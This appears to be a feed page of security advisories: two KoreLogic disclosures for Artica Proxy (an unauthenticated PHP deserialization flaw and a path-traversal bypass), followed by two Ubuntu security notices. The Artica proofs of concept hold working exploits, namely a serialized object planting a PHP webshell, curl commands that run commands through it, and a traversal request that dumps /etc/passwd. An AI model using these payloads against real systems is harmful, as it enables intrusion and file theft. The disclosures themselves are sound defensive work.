      "Net_DNS2_Cache_File" class. The "__destruct" method  
      within this class will write to arbitrary files defined  
      by the class:

        public function __destruct()  
        {  
            //  
            // if there's no cache file set, then there's nothing to do  
            //  
            if (strlen($this->cache_file) == 0) {  
                return;  
            }

            //  
            // open the file for reading/writing  
            //  
            $fp = fopen($this->cache_file, 'a+');  
            if ($fp !== false) {  
            ...  
            if (!is_null($data)) {

                //  
                // write the file contents  
                //  
                fwrite($fp, $data);  
            }

      An unauthenticated user can overwrite existing files and  
      insert a webshell to execute malicious PHP as the "www-data"  
      user.

4. Mitigation and Remediation Recommendation

      No response from vendor. This vulnerability can be remediated  
      by deleting the 'usr/share/artica-postfix/wizard' directory  
      if it is not needed. Otherwise, move it to a location outside  
      of the web root.

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic,  
      Inc.

6. Disclosure Timeline

      2023.12.18 - KoreLogic requests vulnerability contact and  
                   secure communication method from Artica.  
      2023.12.18 - Artica Support issues automated ticket #1703011342  
                   promising follow-up from a human.  
      2024.01.10 - KoreLogic again requests vulnerability contact and  
                   secure communication method from Artica.  
      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from  
                   mail.articatech.com with response  
                   "Client host rejected: Go Away!"  
      2024.01.11 - KoreLogic requests vulnerability contact and  
                   secure communication method via  
                   https://www.articatech.com/ 'Contact Us' web form.  
      2024.01.23 - KoreLogic requests CVE from MITRE.  
      2024.01.23 - MITRE issues automated ticket #1591692 promising  
                   follow-up from a human.  
      2024.02.01 - 30 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.02.06 - KoreLogic requests update on CVE from MITRE.  
      2024.02.15 - KoreLogic requests update on CVE from MITRE.  
      2024.02.22 - KoreLogic reaches out to alternate CNA for  
                   CVE identifiers.  
      2024.02.26 - 45 business days have elapsed since KoreLogic  
                   attempted to contact the vendor.  
      2024.02.29 - Vulnerability details presented to AHA!  
                   (takeonme.org) by proxy.  
      2024.03.01 - AHA! issues CVE-2024-2054 to track this  
                   vulnerability.  
      2024.03.05 - KoreLogic public disclosure.

7. Proof of Concept

      To overwrite the "wiz.upload.php" file to contain a PHP  
      webshell, the following serialized object can be base64  
      encoded and submitted via the "build-js" query parameter:

O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php   
system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

        $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k   
"$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d"   
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

      {"uid=33(www-data) gid=33(www-data) groups=33(www-data)  
       ":{"cache_date":1696883506,"ttl":8303116493}}

The contents of this advisory are copyright(c) 2024  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:  
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.50 Unauthenticated PHP Deserialization

Artica Proxy versions 4.40 and 4.50 suffer from a local file inclusion protection bypass vulnerability that allows for path traversal.

    KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityTitle: Artica Proxy Unauthenticated LFI Protection Bypass VulnerabilityAdvisory ID: KL-001-2024-001Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-23: Relative Path Traversal      CVE ID: CVE-2024-20532. Vulnerability Description      The Artica Proxy administrative web application attempts to      prevent local file inclusion. These protections can be bypassed      and arbitrary file requests supplied by unauthenticated      users will be returned according to the privileges of the      "www-data" user.3. Technical Description      Prior to authentication, a user can send an HTTP request to      the "images.listener.php" endpoint. This endpoint processes      the "mailattach" query parameter and concatonates the user      supplied value to the "/opt/artica/share/www/attachments/"      file path. The contents of the file located at the newly      created path is returned in the HTTP response body.      The "images.listener.php" endpoint attempts to prevent      a local file inclusion vulnerability by stripping strings      that attempt to traverse into the parent directory from      the user supplied "mailattach" value:$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";        header("Content-type: application/force-download" );        header("Content-Disposition: attachment; \                filename=\"{$_GET["mailattach"]}\"");        header("Content-Length: ".filesize($file)."" );        header("Expires: 0" );        readfile($file);      If effective, this approach would limit files      accessible by this endpoint to those within the      "/opt/artica/share/www/attachments/" directory. Unfortunately,      the removal of the "../" string is only performed once, so      the resulting file path is not checked.  By using the path      "..././foo.txt", the "images.listener.php" endpoint removes the      "../" string resulting in "../foo.txt" - a relative file path      to traverse to the parent directory.      The strings "/etc/" and "passwd" are also stripped from the file      path as many methods of detecting a path traversal vulnerability      rely on fetching the "/etc/passwd" file. By inserting these      strings into specific locations, a user suppplied "mailattach"      value such as "/epasswdtc/ppasswdasswd" is transformed into      "/etc/passwd", bypassing the protection entirely.      An unauthenticated user can leverage this endpoint to read      files on the system, according to the privileges of the      "www-data" user.4. Mitigation and Remediation Recommendation      No response from vendor; no remediation available.5. Credit      This vulnerability was discovered by Jaggar Henry of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2053 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      $ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'      root:x:0:0:root:/root:/bin/bash      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin      bin:x:2:2:bin:/bin:/usr/sbin/nologin      sys:x:3:3:sys:/dev:/usr/sbin/nologin      sync:x:4:65534:sync:/bin:/bin/sync      games:x:5:60:games:/usr/games:/usr/sbin/nologin      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin      irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin      _apt:x:100:65534::/nonexistent:/usr/sbin/nologin      systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin      systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin      systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin      messagebus:x:104:110::/nonexistent:/usr/sbin/nologin      mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false      quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin      apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh      privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin      ntp:x:109:117::/nonexistent:/usr/sbin/nologin      redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin      prads:x:111:120::/home/prads:/usr/sbin/nologin      freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin      vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin      stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin      sshd:x:115:65534::/run/sshd:/usr/sbin/nologin      vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin      memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false      davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin      ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin      proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin      ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin      mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin      openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false      munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin      msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin      Debian-snmp:x:126:132::/var/lib/snmp:/bin/false      opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin      avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin      glances:x:129:135::/var/lib/glances:/usr/sbin/nologinArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash      Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin      smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin      debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh      netdata:x:1001:1002:netdata:/home/netdata:/bin/bash      postfix:x:1002:1001::/home/postfix:/bin/sh      ...      ...The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal

Ubuntu Security Notice 6679-1 - It was discovered that FRR incorrectly handled certain malformed OSPF LSA packets. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6679-1March 06, 2024frr vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:FRR could be made to crash if it received specially crafted networktraffic.Software Description:- frr: FRRouting suite of internet protocolsDetails:It was discovered that FRR incorrectly handled certain malformed OSPF LSApackets. A remote attacker could possibly use this issue to cause FRR tocrash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   frr                             8.4.4-1.1ubuntu1.3Ubuntu 22.04 LTS:   frr                             8.1-1ubuntu1.9In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6679-1   CVE-2024-27913Package Information:   https://launchpad.net/ubuntu/+source/frr/8.4.4-1.1ubuntu1.3   https://launchpad.net/ubuntu/+source/frr/8.1-1ubuntu1.9

Ubuntu Security Notice USN-6679-1

Ubuntu Security Notice 6676-1 - Vojtěch Vobr discovered that c-ares incorrectly handled user input from local configuration files. An attacker could possibly use this issue to cause a denial of service via application crash.

==========================================================================  
Ubuntu Security Notice USN-6676-1  
March 06, 2024

c-ares vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

c-ares could be made to crash if it received specially crafted  
input.

Software Description:  
- c-ares: library for asynchronous name resolution

Details:

Vojtěch Vobr discovered that c-ares incorrectly handled user input from  
local configuration files. An attacker could possibly use this issue to  
cause a denial of service via application crash.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libc-ares2                      1.19.1-3ubuntu0.1

Ubuntu 22.04 LTS:  
   libc-ares2                      1.18.1-1ubuntu0.22.04.3

Ubuntu 20.04 LTS:  
   libc-ares2                      1.15.0-1ubuntu0.5

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libc-ares2                      1.14.0-1ubuntu0.2+esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libc-ares2                      1.10.0-3ubuntu0.2+esm3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6676-1  
   CVE-2024-25629

Package Information:  
   https://launchpad.net/ubuntu/+source/c-ares/1.19.1-3ubuntu0.1  
   https://launchpad.net/ubuntu/+source/c-ares/1.18.1-1ubuntu0.22.04.3  
   https://launchpad.net/ubuntu/+source/c-ares/1.15.0-1ubuntu0.5

Source

Packet Storm